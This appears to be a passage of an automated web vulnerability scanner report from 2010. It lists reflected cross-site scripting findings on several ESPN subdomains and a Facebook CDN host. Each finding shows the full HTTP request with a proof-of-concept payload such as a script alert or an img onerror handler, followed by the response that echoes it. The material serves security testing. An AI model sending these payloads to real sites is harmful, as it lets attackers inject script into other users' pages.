s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:19 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT Content-Length: 81915 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay"> ...[SNIP]...
5.117. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/6757/serbia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT Content-Length: 82015 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab3f<script>alert(1)</script>2f1f80457b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /keyword/searchcab3f<script>alert(1)</script>2f1f80457b3 HTTP/1.1 Host: sports.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289019231610; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; AcceptCookies=yes; CRBLM=CBLM-001:; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 136 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/keyword/searchcab3f<script>alert(1)</script>2f1f80457b3</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 was submitted in the REST URL parameter 3. This input was echoed as f5fd1<img src=a onerror=alert(1)>6deddee5e17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /connect.php/js/FB.Sharef5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 X-Cnection: close Expires: Sat, 06 Nov 2010 17:21:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 06 Nov 2010 17:21:15 GMT Content-Length: 88 Connection: close
/* "FB.Sharef5fd1<img src=a onerror=alert(1)>6deddee5e17" is not a valid component. */
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ceec<script>alert(1)</script>05c8d5071b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 101c7<script>alert(1)</script>0c34eaeab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en101c7<script>alert(1)</script>0c34eaeab34/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 128 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en101c7<script>alert(1)</script>0c34eaeab34/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebfd3<script>alert(1)</script>d621151af8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enebfd3<script>alert(1)</script>d621151af8a/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enebfd3<script>alert(1)</script>d621151af8a/conversation</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6338<script>alert(1)</script>735d75941d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/conversationc6338<script>alert(1)</script>735d75941d4 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 137 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/conversationc6338<script>alert(1)</script>735d75941d4</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71549<script>alert(1)</script>907b7ff7526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058b<script>alert(1)</script>6b3ce37571f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f2a<script>alert(1)</script>2fd0abe5ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en67f2a<script>alert(1)</script>2fd0abe5ee5/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en67f2a<script>alert(1)</script>2fd0abe5ee5/entry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9d1a<script>alert(1)</script>bc676b3bd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
